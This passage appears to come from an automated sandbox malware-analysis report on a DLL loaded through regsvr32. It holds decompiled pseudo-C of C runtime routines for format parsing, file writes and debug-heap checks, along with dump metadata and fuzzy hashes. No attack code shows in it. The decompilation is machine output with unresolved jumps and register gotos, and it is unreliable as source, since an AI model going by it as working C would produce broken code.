                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}






                                                                                        0x7fef9d3dc41
                                                                                        0x7fef9d3dc61
                                                                                        0x7fef9d3dc6b
                                                                                        0x7fef9d3dc77
                                                                                        0x7fef9d3dc7f
                                                                                        0x7fef9d3dc87
                                                                                        0x7fef9d3dc8b
                                                                                        0x7fef9d3dc93
                                                                                        0x7fef9d3dc9b
                                                                                        0x7fef9d3dcb0
                                                                                        0x7fef9d3dcbf
                                                                                        0x7fef9d3dcc9
                                                                                        0x7fef9d3dcd3
                                                                                        0x7fef9d3dcdd
                                                                                        0x7fef9d3dce7
                                                                                        0x7fef9d3dce9
                                                                                        0x7fef9d3dcf2
                                                                                        0x7fef9d3dcf6
                                                                                        0x7fef9d3dcff
                                                                                        0x7fef9d3dd03
                                                                                        0x7fef9d3dd0c
                                                                                        0x7fef9d3dd10
                                                                                        0x7fef9d3dd16
                                                                                        0x7fef9d3dd1e
                                                                                        0x7fef9d3dd27
                                                                                        0x7fef9d3dd3b
                                                                                        0x7fef9d3dd3d
                                                                                        0x7fef9d3dd4a
                                                                                        0x7fef9d3dd53
                                                                                        0x7fef9d3dd5c
                                                                                        0x7fef9d3dd66
                                                                                        0x7fef9d3dd6a
                                                                                        0x7fef9d3dd7f
                                                                                        0x7fef9d3dd88
                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-734865713
                                                                                        • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                        • Instruction ID: 4e41d9db2091814ce308bd8b3badba688d1355b6a5e36393cab3bd2279fd69d5
                                                                                        • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                        • Instruction Fuzzy Hash: 01412AB2A0C6C286E7F09B64E8407BEB2E4F384346F600126D6CD876A9DB3ED444CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 24%
                                                                                        			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                        				void* _t114;
                                                                                        				char* _t134;
                                                                                        
                                                                                        				_a116 = 0;
                                                                                        				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                                        				_t134 =  &_a1112;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t134);
                                                                                        				if (_a116 >= 0) goto 0xf9d3be14;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3be2d;
                                                                                        				_a116 = _t114 + _t134 - 0x30;
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}





                                                                                        0x7fef9d3bdda
                                                                                        0x7fef9d3bdf2
                                                                                        0x7fef9d3bdf4
                                                                                        0x7fef9d3be01
                                                                                        0x7fef9d3be0a
                                                                                        0x7fef9d3be0c
                                                                                        0x7fef9d3be14
                                                                                        0x7fef9d3be29
                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-192189897
                                                                                        • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                        • Instruction ID: 25f4969c447c8d4d660c638a7323c6370fe89c3a0b7b258112d187f79a668fd6
                                                                                        • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                                        • Instruction Fuzzy Hash: ED416E72A0DAC28AE3F0DB24E8547BEB7E4E384345F600126D6DD869A9DB7ED140CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 24%
                                                                                        			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                        				void* _t114;
                                                                                        				char* _t134;
                                                                                        
                                                                                        				_a116 = 0;
                                                                                        				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                                        				_t134 =  &_a1560;
                                                                                        				_a116 = E000007FE7FEF9D31E40(_t134);
                                                                                        				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                                        				_a116 = 0xffffffff;
                                                                                        				goto 0xf9d3dddb;
                                                                                        				_a116 = _t114 + _t134 - 0x30;
                                                                                        				_a1408 = _a1208 & 0x0000ffff;
                                                                                        				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                                        				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                                        				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                                        				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                                        				goto 0xf9d3df88;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                                        				_a1544 =  &(_a1544[1]);
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3de61;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                                        				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                                        				_a1544 =  &(_a1544[2]);
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3df6d;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                                        				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                                        				goto 0xf9d3df6d;
                                                                                        				_a1216 = 0;
                                                                                        				goto E000007FE7FEF9D3DC41;
                                                                                        				goto 0xf9d3df88;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3df88;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}





                                                                                        0x7fef9d3dd88
                                                                                        0x7fef9d3dda0
                                                                                        0x7fef9d3dda2
                                                                                        0x7fef9d3ddaf
                                                                                        0x7fef9d3ddb8
                                                                                        0x7fef9d3ddba
                                                                                        0x7fef9d3ddc2
                                                                                        0x7fef9d3ddd7
                                                                                        0x7fef9d3dde8
                                                                                        0x7fef9d3ddf7
                                                                                        0x7fef9d3de01
                                                                                        0x7fef9d3de0f
                                                                                        0x7fef9d3de19
                                                                                        0x7fef9d3de1f
                                                                                        0x7fef9d3de32
                                                                                        0x7fef9d3de40
                                                                                        0x7fef9d3de4c
                                                                                        0x7fef9d3de54
                                                                                        0x7fef9d3de5d
                                                                                        0x7fef9d3de61
                                                                                        0x7fef9d3de6a
                                                                                        0x7fef9d3de80
                                                                                        0x7fef9d3de91
                                                                                        0x7fef9d3de9f
                                                                                        0x7fef9d3deab
                                                                                        0x7fef9d3deb3
                                                                                        0x7fef9d3dec6
                                                                                        0x7fef9d3ded7
                                                                                        0x7fef9d3dee5
                                                                                        0x7fef9d3def1
                                                                                        0x7fef9d3def9
                                                                                        0x7fef9d3df09
                                                                                        0x7fef9d3df19
                                                                                        0x7fef9d3df29
                                                                                        0x7fef9d3df39
                                                                                        0x7fef9d3df49
                                                                                        0x7fef9d3df59
                                                                                        0x7fef9d3df5b
                                                                                        0x7fef9d3df5d
                                                                                        0x7fef9d3df68
                                                                                        0x7fef9d3df6d
                                                                                        0x7fef9d3df76
                                                                                        0x7fef9d3df7a
                                                                                        0x7fef9d3df80
                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-734865713
                                                                                        • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                        • Instruction ID: 6afb929124b84414141dd4680376ccf7afecd9c4b7d6d92296aea7179b7f5a27
                                                                                        • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                        • Instruction Fuzzy Hash: 024109A2A0C6C286E7F09B64E8447BEB6E4F394346F600126D6CD876A5DB3ED444DF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                                                                        • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                                                        • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                        • API String ID: 275287319-2412454244
                                                                                        • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                        • Instruction ID: f463794f61061979348d28cf0890255f55ae464b61bc66257c006d95a81b41bb
                                                                                        • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                                        • Instruction Fuzzy Hash: A8316372A18B85C6D790CB28E88066E77A1F7857A5F604325E6FE47AF9CB3DD441CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_unlock
                                                                                        • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                        • API String ID: 2816345473-1282596470
                                                                                        • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                        • Instruction ID: 0c290ab1c852a48438f6a901ce88093280091c3cb9967e086700a94ae8aeefb6
                                                                                        • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                                        • Instruction Fuzzy Hash: 18313371D1D2428AE3A08B68ED4476E77E0F741364F615236A6CD866F4D77EE4488B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free_nolock$_unlock
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                                                        • API String ID: 2500497606-1087415141
                                                                                        • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                        • Instruction ID: 34f18152e293ad813cf8b9b11c4969fef8ff7405ef187e896dde4a1f66726313
                                                                                        • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                        • Instruction Fuzzy Hash: 4121FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                                                        • String ID: csm
                                                                                        • API String ID: 933340387-1018135373
                                                                                        • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                        • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                                                                        • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                        • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno_invalid_parameter
                                                                                        • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                        • API String ID: 4140903211-23161695
                                                                                        • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                        • Instruction ID: f549bc85806da522572ee7890384280d6aac56d4f037a7782e26525923b50f93
                                                                                        • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                        • Instruction Fuzzy Hash: A2112A71A29606CAF7D0AB14ED5476E72E1F3507C9FA09125E2CD026E4D77EE504CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno_invalid_parameter
                                                                                        • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                        • API String ID: 4140903211-3042049227
                                                                                        • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                        • Instruction ID: 08953b95d21c5f70e3699fefb321eca4419d040150facc41ebc10b04699de718
                                                                                        • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                        • Instruction Fuzzy Hash: F8115731E0C646DAF7A4AF24EC117AE73D0F780398FA0912692CC026E5DB7EE644CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno_invalid_parameter
                                                                                        • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                        • API String ID: 4140903211-1338331675
                                                                                        • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                        • Instruction ID: 8bdd68c2d8658697f17e3158693f35fff5fb9c26cbdf8bf42c76b87004d789dc
                                                                                        • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                        • Instruction Fuzzy Hash: F0014CB1A18646C6FB90AB24EC4076D36E0F350358FB04125E28D036F5C7BED544CB01
                                                                                        Uniqueness

